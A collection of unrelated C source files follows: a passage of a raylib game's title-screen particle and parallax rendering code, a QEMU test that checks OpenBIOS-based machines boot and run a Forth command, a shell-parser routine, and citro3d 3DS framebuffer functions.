flowerParticle.particle[i].position.x -= 2*TIME_FACTOR; flowerParticle.particle[i].rotation += 0.5*TIME_FACTOR; if (flowerParticle.particle[i].position.y >= GetScreenHeight()) flowerParticle.particle[i].active = false; } if (backFlowerParticle.particle[i].active) { backFlowerParticle.particle[i].position.y += 2*TIME_FACTOR; backFlowerParticle.particle[i].position.x -= 3*TIME_FACTOR; backFlowerParticle.particle[i].rotation += 0.5*TIME_FACTOR; if (backFlowerParticle.particle[i].position.y >= GetScreenHeight()) backFlowerParticle.particle[i].active = false; } if (rainParticle.particle[i].active) { rainParticle.particle[i].position.y += 4*TIME_FACTOR; rainParticle.particle[i].position.x -= 5*TIME_FACTOR; //rainParticle.particle[i].rotation += 0.5; if (rainParticle.particle[i].position.y >= GetScreenHeight()) rainParticle.particle[i].active = false; } if (backRainParticle.particle[i].active) { backRainParticle.particle[i].position.y += 3*TIME_FACTOR; backRainParticle.particle[i].position.x -= 3*TIME_FACTOR; //rainParticle.particle[i].rotation += 0.5; if (backRainParticle.particle[i].position.y >= GetScreenHeight()) backRainParticle.particle[i].active = false; } } for (int i = 0; i < 1024; i++) { if (rainStormParticle.particle[i].active) { rainStormParticle.particle[i].position.y += 12*TIME_FACTOR; rainStormParticle.particle[i].position.x -= 15*TIME_FACTOR; //rainParticle.particle[i].rotation += 0.5; if (rainStormParticle.particle[i].position.y >= GetScreenHeight()) rainStormParticle.particle[i].active = false; if (rainStormParticle.active == false)rainStormParticle.particle[i].alpha -= 0.01; } } for (int i = 0; i < 256; i++) { if (snowStormParticle.particle[i].active) { snowStormParticle.particle[i].position.y += 12; snowStormParticle.particle[i].position.x -= 15; snowStormParticle.particle[i].rotation += 0.5; if (snowStormParticle.particle[i].position.y >= GetScreenHeight()) snowStormParticle.particle[i].active = false; } } for (int i = 0; i < 20; i++) { if (rayparticle.particle[i].active) { rayparticle.particle[i].position.x -= 0.5*TIME_FACTOR; if (rayparticle.particle[i].fading) { rayparticle.particle[i].alpha -= 0.01f; if (rayparticle.particle[i].alpha <= 0) { rayparticle.particle[i].alpha = 0; rayparticle.particle[i].delayCounter++; if (rayparticle.particle[i].delayCounter >= 30) { rayparticle.particle[i].active = false; rayparticle.particle[i].delayCounter = 0; rayparticle.particle[i].fading = false; } } } else { rayparticle.particle[i].alpha += 0.01f; if (rayparticle.particle[i].alpha >= 0.5f) { rayparticle.particle[i].alpha = 0.5f; rayparticle.particle[i].delayCounter++; if (rayparticle.particle[i].delayCounter >= 30) { rayparticle.particle[i].delayCounter = 0; rayparticle.particle[i].fading = true; } } } } if (backRayparticle.particle[i].active) { backRayparticle.particle[i].position.x -= 0.5; if (backRayparticle.particle[i].fading) { backRayparticle.particle[i].alpha -= 0.01f; if (backRayparticle.particle[i].alpha <= 0) { backRayparticle.particle[i].alpha = 0; backRayparticle.particle[i].delayCounter++; if (backRayparticle.particle[i].delayCounter >= 30) { backRayparticle.particle[i].active = false; backRayparticle.particle[i].delayCounter = 0; backRayparticle.particle[i].fading = false; } } } else { backRayparticle.particle[i].alpha += 0.01f; if (backRayparticle.particle[i].alpha >= 0.5f) { backRayparticle.particle[i].alpha = 0.5f; backRayparticle.particle[i].delayCounter++; if (backRayparticle.particle[i].delayCounter >= 30) { backRayparticle.particle[i].delayCounter = 0; backRayparticle.particle[i].fading = true; } } } } } // Press enter to change to GAMEPLAY screen #if (defined(PLATFORM_ANDROID) || defined(PLATFORM_WEB)) if (((IsGestureDetected(GESTURE_TAP) || (GetGestureDetected() == GESTURE_DOUBLETAP)) && framesCounter >= duration)) { //finishScreen = 1; // OPTIONS finishScreen = 2; // GAMEPLAY } #elif (defined(PLATFORM_DESKTOP) || defined(PLATFORM_WEB)) if ((IsKeyPressed(KEY_ENTER) && framesCounter >= duration)) { //finishScreen = 1; // OPTIONS finishScreen = 2; // GAMEPLAY } #endif } // Title Screen Draw logic void DrawTitleScreen(void) { BeginShaderMode(colorBlend); DrawTexturePro(atlas02, gameplay_background, (Rectangle){0, 0, gameplay_background.width*2, gameplay_background.height*2}, (Vector2){0, 0}, 0, color02); // Draw parallax DrawParallaxBack(); DrawParallaxMiddle(); for (int i = 0; i < MAX_particle; i++) { if (backSnowParticle.particle[i].active) DrawTexturePro(atlas02, particle_icecrystal_bw, (Rectangle){ backSnowParticle.particle[i].position.x, backSnowParticle.particle[i].position.y, particle_icecrystal_bw.width*backSnowParticle.particle[i].size, particle_icecrystal_bw.height*backSnowParticle.particle[i].size }, (Vector2){ particle_icecrystal_bw.width*backSnowParticle.particle[i].size/2, particle_icecrystal_bw.height*backSnowParticle.particle[i].size/2 }, backSnowParticle.particle[i].rotation, Fade((Color){144, 214, 255, 255}, backSnowParticle.particle[i].alpha)); if (backPlanetreeParticle.particle[i].active) DrawTexturePro(atlas02, particle_planetreeleaf_bw, (Rectangle){ backPlanetreeParticle.particle[i].position.x, backPlanetreeParticle.particle[i].position.y, particle_planetreeleaf_bw.width*backPlanetreeParticle.particle[i].size, particle_planetreeleaf_bw.height*backPlanetreeParticle.particle[i].size }, (Vector2){ particle_planetreeleaf_bw.width*backPlanetreeParticle.particle[i].size/2, particle_planetreeleaf_bw.height*backPlanetreeParticle.particle[i].size/2 }, backPlanetreeParticle.particle[i].rotation, Fade((Color){179, 86, 6, 255}, backPlanetreeParticle.particle[i].alpha)); if (dandelionBackParticle.particle[i].active) DrawTexturePro(atlas02, particle_dandelion_bw, (Rectangle){ dandelionBackParticle.particle[i].position.x, dandelionBackParticle.particle[i].position.y, particle_dandelion_bw.width*dandelionBackParticle.particle[i].size, particle_dandelion_bw.height*dandelionBackParticle.particle[i].size }, (Vector2){ particle_dandelion_bw.width*dandelionBackParticle.particle[i].size/2, particle_dandelion_bw.height*dandelionBackParticle.particle[i].size/2 }, dandelionBackParticle.particle[i].rotation, Fade((Color){202, 167, 126, 255}, dandelionBackParticle.particle[i].alpha)); if (backFlowerParticle.particle[i].active) DrawTexturePro(atlas02, particle_ecualyptusflower_bw, (Rectangle){ backFlowerParticle.particle[i].position.x, backFlowerParticle.particle[i].position.y, particle_ecualyptusflower_bw.width*backFlowerParticle.particle[i].size, particle_ecualyptusflower_bw.height*backFlowerParticle.particle[i].size }, (Vector2){ particle_ecualyptusflower_bw.width*backFlowerParticle.particle[i].size/2, particle_ecualyptusflower_bw.height*backFlowerParticle.particle[i].size/2 }, backFlowerParticle.particle[i].rotation, Fade((Color){218, 84, 108, 255}, backFlowerParticle.particle[i].alpha)); if (backRainParticle.particle[i].active) DrawTexturePro(atlas02, particle_waterdrop_bw, (Rectangle){ backRainParticle.particle[i].position.x, backRainParticle.particle[i].position.y, particle_waterdrop_bw.width*backRainParticle.particle[i].size, particle_waterdrop_bw.height*backRainParticle.particle[i].size }, (Vector2){ particle_waterdrop_bw.width*backRainParticle.particle[i].size/2, particle_waterdrop_bw.height*backRainParticle.particle[i].size/2 }, backRainParticle.particle[i].rotation, Fade((Color){144, 183, 187, 255}, backRainParticle.particle[i].alpha)); } for (int i = 0; i < 20; i++) { if (backRayparticle.particle[i].active) DrawTexturePro(atlas02, gameplay_back_fx_lightraymid, (Rectangle){ backRayparticle.particle[i].position.x, backRayparticle.particle[i].position.y, gameplay_back_fx_lightraymid.width*backRayparticle.particle[i].size, gameplay_back_fx_lightraymid.height*backRayparticle.particle[i].size }, (Vector2){ gameplay_back_fx_lightraymid.width*backRayparticle.particle[i].size/2, gameplay_back_fx_lightraymid.height*backRayparticle.particle[i].size/2 }, backRayparticle.particle[i].rotation, Fade(GOLD, backRayparticle.particle[i].alpha)); } DrawParallaxFront(); for (int i = 0; i < 5; i++) { DrawTexturePro(atlas02, gameplay_props_tree, (Rectangle){bamboo[i].x, bamboo[i].y, 43, 720}, (Vector2){0, 0}, 0, color03); //DrawRectangleRec(bamboo[i], Fade(LIME, 0.5)); } EndShaderMode(); DrawTextureRec(atlas01, koalaMenu, (Vector2){player.x - player.width, player.y - 40}, WHITE); BeginShaderMode(colorBlend); DrawTexturePro(atlas02, gameplay_back_ground00, (Rectangle){0, 637, gameplay_back_ground00.width*2, gameplay_back_ground00.height*2}, (Vector2){0,0}, 0, color00); EndShaderMode(); DrawTexturePro(atlas01, (Rectangle){title_titletext.x, title_titletext.y, title_titletext.width, 230}, (Rectangle){GetScreenWidth()*0.49F - title_titletext.width/2, currentValue1, title_titletext.width, 235}, (Vector2){0, 0}, 0, WHITE); DrawTexturePro(atlas01, (Rectangle){title_titletext.x, title_titletext.y + 232, title_titletext.width, 116}, (Rectangle){GetScreenWidth()*0.49F - title_titletext.width/2, currentValue2, title_titletext.width, 116}, (Vector2){0, 0}, 0, WHITE); if ((framesCounter/60)%2 && framesCounter >= duration) DrawTextEx(font, pressToPlay, (Vector2){ GetScreenWidth()/2 - fontSize.x/2, GetScreenHeight()/2 + fontSize.y*2 }, font.baseSize, 2, (Color){247, 239, 209, 255}); for (int i = 0; i < MAX_particle; i++) { if (snowParticle.particle[i].active) DrawTexturePro(atlas01, particle_icecrystal, (Rectangle){ snowParticle.particle[i].position.x, snowParticle.particle[i].position.y, particle_icecrystal.width*snowParticle.particle[i].size, particle_icecrystal.height*snowParticle.particle[i].size }, (Vector2){ particle_icecrystal.width*snowParticle.particle[i].size/2, particle_icecrystal.height*snowParticle.particle[i].size/2 }, snowParticle.particle[i].rotation, Fade(snowParticle.particle[i].color, snowParticle.particle[i].alpha)); if (planetreeParticle.particle[i].active) DrawTexturePro(atlas01, particle_planetreeleaf, (Rectangle){ planetreeParticle.particle[i].position.x, planetreeParticle.particle[i].position.y, particle_planetreeleaf.width*planetreeParticle.particle[i].size, particle_planetreeleaf.height*planetreeParticle.particle[i].size }, (Vector2){ particle_planetreeleaf.width*planetreeParticle.particle[i].size/2, particle_planetreeleaf.height*planetreeParticle.particle[i].size/2 }, planetreeParticle.particle[i].rotation, Fade(planetreeParticle.particle[i].color, planetreeParticle.particle[i].alpha)); if (dandelionParticle.particle[i].active) DrawTexturePro(atlas01, particle_dandelion, (Rectangle){ dandelionParticle.particle[i].position.x, dandelionParticle.particle[i].position.y, particle_dandelion.width*dandelionParticle.particle[i].size, particle_dandelion.height*dandelionParticle.particle[i].size }, (Vector2){ particle_dandelion.width*dandelionParticle.particle[i].size/2, particle_dandelion.height*dandelionParticle.particle[i].size/2 }, dandelionParticle.particle[i].rotation, Fade(dandelionParticle.particle[i].color, dandelionParticle.particle[i].alpha)); if (flowerParticle.particle[i].active) DrawTexturePro(atlas01, particle_ecualyptusflower, (Rectangle){ flowerParticle.particle[i].position.x, flowerParticle.particle[i].position.y, particle_ecualyptusflower.width*flowerParticle.particle[i].size, particle_ecualyptusflower.height*flowerParticle.particle[i].size }, (Vector2){ particle_ecualyptusflower.width*flowerParticle.particle[i].size/2, particle_ecualyptusflower.height*flowerParticle.particle[i].size/2 }, flowerParticle.particle[i].rotation, Fade(flowerParticle.particle[i].color, flowerParticle.particle[i].alpha)); if (rainParticle.particle[i].active) DrawTexturePro(atlas01, particle_waterdrop, (Rectangle){ rainParticle.particle[i].position.x, rainParticle.particle[i].position.y, particle_waterdrop.width*rainParticle.particle[i].size, particle_waterdrop.height*rainParticle.particle[i].size }, (Vector2){ particle_waterdrop.width*rainParticle.particle[i].size/2, particle_waterdrop.height*rainParticle.particle[i].size/2 }, rainParticle.particle[i].rotation, Fade(rainParticle.particle[i].color, rainParticle.particle[i].alpha)); } for (int i = 0; i < 1024; i++) { if (rainStormParticle.particle[i].active) DrawTexturePro(atlas01, particle_waterdrop, (Rectangle){ rainStormParticle.particle[i].position.x, rainStormParticle.particle[i].position.y, particle_waterdrop.width*rainStormParticle.particle[i].size, particle_waterdrop.height*rainStormParticle.particle[i].size }, (Vector2){ particle_waterdrop.width*rainStormParticle.particle[i].size/2, particle_waterdrop.height*rainStormParticle.particle[i].size/2 }, rainStormParticle.particle[i].rotation, Fade(rainStormParticle.particle[i].color, rainStormParticle.particle[i].alpha)); } for (int i = 0; i < 256; i++) { if (snowStormParticle.particle[i].active) DrawTexturePro(atlas01, particle_icecrystal, (Rectangle){ snowStormParticle.particle[i].position.x, snowStormParticle.particle[i].position.y, particle_icecrystal.width*snowStormParticle.particle[i].size, particle_icecrystal.height*snowStormParticle.particle[i].size }, (Vector2){ particle_icecrystal.width*snowStormParticle.particle[i].size/2, particle_icecrystal.height*snowStormParticle.particle[i].size/2 }, snowStormParticle.particle[i].rotation, Fade(snowStormParticle.particle[i].color, snowStormParticle.particle[i].alpha)); } for (int i = 0; i < 20; i++) { if (rayparticle.particle[i].active) DrawTexturePro(atlas01, gameplay_fx_lightraymid, (Rectangle){ rayparticle.particle[i].position.x, rayparticle.particle[i].position.y, gameplay_fx_lightraymid.width*rayparticle.particle[i].size, gameplay_fx_lightraymid.height*rayparticle.particle[i].size }, (Vector2){ gameplay_fx_lightraymid.width*rayparticle.particle[i].size/2, gameplay_fx_lightraymid.height*rayparticle.particle[i].size/2 }, rayparticle.particle[i].rotation, Fade(rayparticle.particle[i].color, rayparticle.particle[i].alpha)); } /* DrawTexturePro(atlas01, title_twitter, (Rectangle){ GetScreenWidth()*0.85, GetScreenHeight()*0.1, title_twitter.width, title_twitter.height}, (Vector2){0,0}, 0, WHITE); DrawTexturePro(atlas01, title_facebook, (Rectangle){ GetScreenWidth()*0.85, GetScreenHeight()*0.3, title_facebook.width, title_facebook.height}, (Vector2){0,0}, 0, WHITE); DrawTexturePro(atlas01, title_googleplay, (Rectangle){ GetScreenWidth()*0.85, GetScreenHeight()*0.5, title_googleplay.width, title_googleplay.height}, (Vector2){0,0}, 0, WHITE); if (soundActive)DrawTexturePro(atlas01, title_music_on, (Rectangle){soundButton.x, soundButton.y, title_music_on.width, title_music_on.height}, (Vector2){0,0}, 0, WHITE); else DrawTexturePro(atlas01, title_music_off, (Rectangle){soundButton.x, soundButton.y, title_music_off.width, title_music_off.height}, (Vector2){0,0}, 0, WHITE); if (musicActive)DrawTexturePro(atlas01, title_speaker_on, (Rectangle){speakerButton.x, speakerButton.y, title_speaker_on.width, title_speaker_on.height}, (Vector2){0,0}, 0, WHITE); else DrawTexturePro(atlas01, title_speaker_off, (Rectangle){speakerButton.x, speakerButton.y, title_speaker_off.width, title_speaker_off.height}, (Vector2){0,0}, 0, WHITE); */ } // Title Screen Unload logic void UnloadTitleScreen(void) { // ... } // Title Screen should finish? int FinishTitleScreen(void) { return finishScreen; } static void DrawParallaxFront(void) { Rectangle ground01 = gameplay_back_ground01; //DrawTexturePro(atlas02, gameplay_back_tree01_layer03, (Rectangle){0, 21, gameplay_back_tree01_layer03.width*2, gameplay_back_tree01_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree01_layer01, (Rectangle){(int)parallaxFrontOffset, 60, gameplay_back_tree01_layer01.width*2, gameplay_back_tree01_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree02_layer01, (Rectangle){(int)parallaxFrontOffset + 140, 60, gameplay_back_tree02_layer01.width*2, gameplay_back_tree02_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree03_layer01, (Rectangle){(int)parallaxFrontOffset + 140*2, 55, gameplay_back_tree02_layer01.width*2, gameplay_back_tree02_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree04_layer01, (Rectangle){(int)parallaxFrontOffset + 140*3, 60, gameplay_back_tree04_layer01.width*2, gameplay_back_tree04_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree05_layer01, (Rectangle){(int)parallaxFrontOffset + 140*4, 60, gameplay_back_tree05_layer01.width*2, gameplay_back_tree05_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree06_layer01, (Rectangle){(int)parallaxFrontOffset + 140*5, 55, gameplay_back_tree06_layer01.width*2, gameplay_back_tree06_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree07_layer01, (Rectangle){(int)parallaxFrontOffset + 140*6, 60, gameplay_back_tree07_layer01.width*2, gameplay_back_tree07_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree08_layer01, (Rectangle){(int)parallaxFrontOffset + 140*7, 60, gameplay_back_tree08_layer01.width*2, gameplay_back_tree08_layer01.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_ground01, (Rectangle){0, 559, ground01.width*2, ground01.height*2}, (Vector2){0,0}, 0, color01); DrawTexturePro(atlas02, (Rectangle){ground01.x, ground01.y + ground01.height, ground01.width, -ground01.height}, (Rectangle){0, -33, ground01.width*2, ground01.height*2}, (Vector2){0,0}, 0, color01); } static void DrawParallaxMiddle(void) { Rectangle ground02 = gameplay_back_ground02; //DrawTexturePro(atlas02, gameplay_back_tree02_layer03, (Rectangle){0, 67, gameplay_back_tree02_layer03.width*2, gameplay_back_tree02_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree01_layer02, (Rectangle){(int)0, 67, gameplay_back_tree01_layer02.width*2, gameplay_back_tree01_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree02_layer02, (Rectangle){(int)140, 67, gameplay_back_tree02_layer02.width*2, gameplay_back_tree02_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree03_layer02, (Rectangle){(int)140*2, 67, gameplay_back_tree03_layer02.width*2, gameplay_back_tree03_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree04_layer02, (Rectangle){(int)140*3, 67, gameplay_back_tree04_layer02.width*2, gameplay_back_tree04_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree05_layer02, (Rectangle){(int)140*4, 67, gameplay_back_tree05_layer02.width*2, gameplay_back_tree05_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree06_layer02, (Rectangle){(int)140*5, 67, gameplay_back_tree06_layer02.width*2, gameplay_back_tree06_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree07_layer02, (Rectangle){(int)140*6, 67, gameplay_back_tree07_layer02.width*2, gameplay_back_tree07_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree08_layer02, (Rectangle){(int)140*7, 67, gameplay_back_tree08_layer02.width*2, gameplay_back_tree08_layer02.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_ground02, (Rectangle){0, 509, ground02.width*2, ground02.height*2}, (Vector2){0,0}, 0, color01); DrawTexturePro(atlas02, (Rectangle){ground02.x, ground02.y + ground02.height, ground02.width, -ground02.height}, (Rectangle){0, 19, ground02.width*2, ground02.height*2}, (Vector2){0,0}, 0, color01); } static void DrawParallaxBack(void) { Rectangle ground03 = gameplay_back_ground03; //DrawTexturePro(atlas02, gameplay_back_tree02_layer03, (Rectangle){0, 67, gameplay_back_tree02_layer03.width*2, gameplay_back_tree02_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree01_layer03, (Rectangle){(int)parallaxBackOffset, 67, gameplay_back_tree01_layer03.width*2, gameplay_back_tree01_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree02_layer03, (Rectangle){(int)parallaxBackOffset + 140, 67, gameplay_back_tree02_layer03.width*2, gameplay_back_tree02_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree03_layer03, (Rectangle){(int)parallaxBackOffset + 140*2, 67, gameplay_back_tree03_layer03.width*2, gameplay_back_tree03_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree04_layer03, (Rectangle){(int)parallaxBackOffset + 140*3, 67, gameplay_back_tree04_layer03.width*2, gameplay_back_tree04_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree05_layer03, (Rectangle){(int)parallaxBackOffset + 140*4, 67, gameplay_back_tree05_layer03.width*2, gameplay_back_tree05_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree06_layer03, (Rectangle){(int)parallaxBackOffset + 140*5, 67, gameplay_back_tree06_layer03.width*2, gameplay_back_tree06_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree07_layer03, (Rectangle){(int)parallaxBackOffset + 140*6, 67, gameplay_back_tree07_layer03.width*2, gameplay_back_tree07_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_tree08_layer03, (Rectangle){(int)parallaxBackOffset + 140*7, 67, gameplay_back_tree08_layer03.width*2, gameplay_back_tree08_layer03.height*2}, (Vector2){0,0}, 0, color02); DrawTexturePro(atlas02, gameplay_back_ground03, (Rectangle){0, 469, ground03.width*2, ground03.height*2}, (Vector2){0,0}, 0, color01); DrawTexturePro(atlas02, (Rectangle){ground03.x, ground03.y + ground03.height, ground03.width, -ground03.height}, (Rectangle){0, 67, ground03.width*2, ground03.height*2}, (Vector2){0,0}, 0, color01); } static float BounceEaseOut(float t,float b , float c, float d) { if ((t/=d) < (1/2.75f)) { return c*(7.5625f*t*t) + b; } else if (t < (2/2.75f)) { float postFix = t-=(1.5f/2.75f); return c*(7.5625f*(postFix)*t + .75f) + b; } else if (t < (2.5/2.75)) { float postFix = t-=(2.25f/2.75f); return c*(7.5625f*(postFix)*t + .9375f) + b; } else { float postFix = t-=(2.625f/2.75f); return c*(7.5625f*(postFix)*t + .984375f) + b; } }
54572.c
/* * Test OpenBIOS-based machines. * * Copyright (c) 2016 Red Hat Inc. * * Author: * Thomas Huth <thuth@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 * or later. See the COPYING file in the top-level directory. * * This test is used to check that some Open Firmware based machines (i.e. * OpenBIOS or SLOF) can be started successfully in TCG mode. To do this, we * first put some Forth code into the "boot-command" Open Firmware environment * variable. This Forth code writes a well-known magic value to a known location * in memory. Then we start the guest so that the firmware can boot and finally * run the Forth code. * The testing code here then can finally check whether the value has been * successfully written into the guest memory. */ #include "qemu/osdep.h" #include "libqtest.h" #define MAGIC 0xcafec0de #define ADDRESS 0x4000 static void check_guest_memory(void) { uint32_t signature; int i; /* Poll until code has run and modified memory. Wait at most 30 seconds */ for (i = 0; i < 10000; ++i) { signature = readl(ADDRESS); if (signature == MAGIC) { break; } g_usleep(10000); } g_assert_cmphex(signature, ==, MAGIC); } static void test_machine(const void *machine) { char *args; args = g_strdup_printf("-M %s,accel=tcg -prom-env 'boot-command=%x %x l!'", (const char *)machine, MAGIC, ADDRESS); qtest_start(args); check_guest_memory(); qtest_quit(global_qtest); g_free(args); } static void add_tests(const char *machines[]) { int i; char *name; for (i = 0; machines[i] != NULL; i++) { name = g_strdup_printf("prom-env/%s", machines[i]); qtest_add_data_func(name, machines[i], test_machine); g_free(name); } } int main(int argc, char *argv[]) { const char *sparc_machines[] = { "SPARCbook", "Voyager", "SS-20", NULL }; const char *sparc64_machines[] = { "sun4u", "sun4v", NULL }; const char *ppc_machines[] = { "mac99", "g3beige", NULL }; const char *ppc64_machines[] = { "mac99", "g3beige", "pseries", NULL }; const char *arch = qtest_get_arch(); g_test_init(&argc, &argv, NULL); if (!strcmp(arch, "ppc")) { add_tests(ppc_machines); } else if (!strcmp(arch, "ppc64")) { add_tests(ppc64_machines); } else if (!strcmp(arch, "sparc")) { add_tests(sparc_machines); } else if (!strcmp(arch, "sparc64")) { add_tests(sparc64_machines); } else { g_assert_not_reached(); } return g_test_run(); }
819938.c
#include "parser.h" /* ** Unstack processus from the stack of tokens. */ static int s_build_command_string(t_proc *p, t_lexer *lexer, int i) { char *tmp; if ((p->command = ft_strnew(0)) == NULL) return (ST_MALLOC); while (i < lexer->size && TOKEN_TYPE(i) == TT_SEPARATOR) i++; while (i < lexer->size) { while (i + 1 < lexer->size && TOKEN_TYPE(i) == TT_SEPARATOR && TOKEN_TYPE(i + 1) == TT_SEPARATOR) i++; if (i >= lexer->size) break ; if (TOKEN_CODE(i) != TC_AND) { tmp = p->command; if ((p->command = ft_strjoin(p->command, TOKEN_CONTENT(i))) == NULL) return (ST_MALLOC); free(tmp); } if (i < lexer->size && TOKEN_CODE(i) == TC_PIPE) break ; i++; } return (ST_OK); } static int s_process_tokens(t_parser *parser, t_lexer *lexer, t_proc *p, int *i) { int ret; while (*i < lexer->size && !(TOKEN_TYPE(*i) == TT_REDIR && TOKEN_CODE(*i) == TC_PIPE)) { ret = lexer->tokens[*i]->parse((void *)p, parser, lexer, i); if (ret != ST_OK) { proc_free(&p); return (ret); } } if (*i < lexer->size) { ret = lexer->tokens[*i]->parse((void *)p, parser, lexer, i); if (ret != ST_OK) { proc_free(&p); return (ret); } } return (ST_OK); } int parser_build_list_unstack_lexer_proc(t_parser *parser, t_lexer *lexer, int *i) { int ret; t_proc *p; t_job *j; j = CONTAINER_OF(parser->target_list_head, t_job, proc_head); while (*i < lexer->size) { if (!(p = proc_alloc(parser->sh, j))) return (ST_MALLOC); if ((ret = s_build_command_string(p, lexer, *i)) != ST_OK) return (ret); if ((ret = s_process_tokens(parser, lexer, p, i)) != ST_OK) return (ret); list_push_back(&p->list_proc, parser->target_list_head); } return (ST_OK); }
523502.c
#include "internal.h" static const u8 colorFmtSizes[] = {2,1,0,0,0}; static const u8 depthFmtSizes[] = {0,0,1,2}; u32 C3D_CalcColorBufSize(u32 width, u32 height, GPU_COLORBUF fmt) { u32 size = width*height; return size*(2+colorFmtSizes[fmt]); } u32 C3D_CalcDepthBufSize(u32 width, u32 height, GPU_DEPTHBUF fmt) { u32 size = width*height; return size*(2+depthFmtSizes[fmt]); } C3D_FrameBuf* C3D_GetFrameBuf(void) { C3D_Context* ctx = C3Di_GetContext(); if (!(ctx->flags & C3DiF_Active)) return NULL; ctx->flags |= C3DiF_FrameBuf; return &ctx->fb; } void C3D_SetFrameBuf(C3D_FrameBuf* fb) { C3D_Context* ctx = C3Di_GetContext(); if (!(ctx->flags & C3DiF_Active)) return; if (fb != &ctx->fb) memcpy(&ctx->fb, fb, sizeof(*fb)); ctx->flags |= C3DiF_FrameBuf; } void C3D_FrameBufTex(C3D_FrameBuf* fb, C3D_Tex* tex, GPU_TEXFACE face, int level) { C3D_FrameBufAttrib(fb, tex->width, tex->height, false); C3D_FrameBufColor(fb, C3D_TexGetImagePtr(tex, C3Di_TexIs2D(tex) ? tex->data : tex->cube->data[face], level, NULL), (GPU_COLORBUF)tex->fmt); } void C3Di_FrameBufBind(C3D_FrameBuf* fb) { u32 param[4] = { 0, 0, 0, 0 }; GPUCMD_AddWrite(GPUREG_FRAMEBUFFER_INVALIDATE, 1); param[0] = osConvertVirtToPhys(fb->depthBuf) >> 3; param[1] = osConvertVirtToPhys(fb->colorBuf) >> 3; param[2] = 0x01000000 | (((u32)(fb->height-1) & 0xFFF) << 12) | (fb->width & 0xFFF); GPUCMD_AddIncrementalWrites(GPUREG_DEPTHBUFFER_LOC, param, 3); GPUCMD_AddWrite(GPUREG_RENDERBUF_DIM, param[2]); GPUCMD_AddWrite(GPUREG_DEPTHBUFFER_FORMAT, fb->depthFmt); GPUCMD_AddWrite(GPUREG_COLORBUFFER_FORMAT, colorFmtSizes[fb->colorFmt] | ((u32)fb->colorFmt << 16)); GPUCMD_AddWrite(GPUREG_FRAMEBUFFER_BLOCK32, fb->block32 ? 1 : 0); // Enable or disable color/depth buffers param[0] = param[1] = fb->colorBuf ? fb->colorMask : 0; param[2] = param[3] = fb->depthBuf ? fb->depthMask : 0; GPUCMD_AddIncrementalWrites(GPUREG_COLORBUFFER_READ, param, 4); } void C3D_FrameBufClear(C3D_FrameBuf* frameBuf, C3D_ClearBits clearBits, u32 clearColor, u32 clearDepth) { u32 size = (u32)frameBuf->width * frameBuf->height; u32 cfs = colorFmtSizes[frameBuf->colorFmt]; u32 dfs = depthFmtSizes[frameBuf->depthFmt]; void* colorBufEnd = (u8*)frameBuf->colorBuf + size*(2+cfs); void* depthBufEnd = (u8*)frameBuf->depthBuf + size*(2+dfs); if (clearBits & C3D_CLEAR_COLOR) { if (clearBits & C3D_CLEAR_DEPTH) GX_MemoryFill( (u32*)frameBuf->colorBuf, clearColor, (u32*)colorBufEnd, BIT(0) | (cfs << 8), (u32*)frameBuf->depthBuf, clearDepth, (u32*)depthBufEnd, BIT(0) | (dfs << 8)); else GX_MemoryFill( (u32*)frameBuf->colorBuf, clearColor, (u32*)colorBufEnd, BIT(0) | (cfs << 8), NULL, 0, NULL, 0); } else GX_MemoryFill( (u32*)frameBuf->depthBuf, clearDepth, (u32*)depthBufEnd, BIT(0) | (dfs << 8), NULL, 0, NULL, 0); } void C3D_FrameBufTransfer(C3D_FrameBuf* frameBuf, gfxScreen_t screen, gfx3dSide_t side, u32 transferFlags) { u32* outputFrameBuf = (u32*)gfxGetFramebuffer(screen, side, NULL, NULL); u32 dim = GX_BUFFER_DIM((u32)frameBuf->width, (u32)frameBuf->height); GX_DisplayTransfer((u32*)frameBuf->colorBuf, dim, outputFrameBuf, dim, transferFlags); }
998649.c
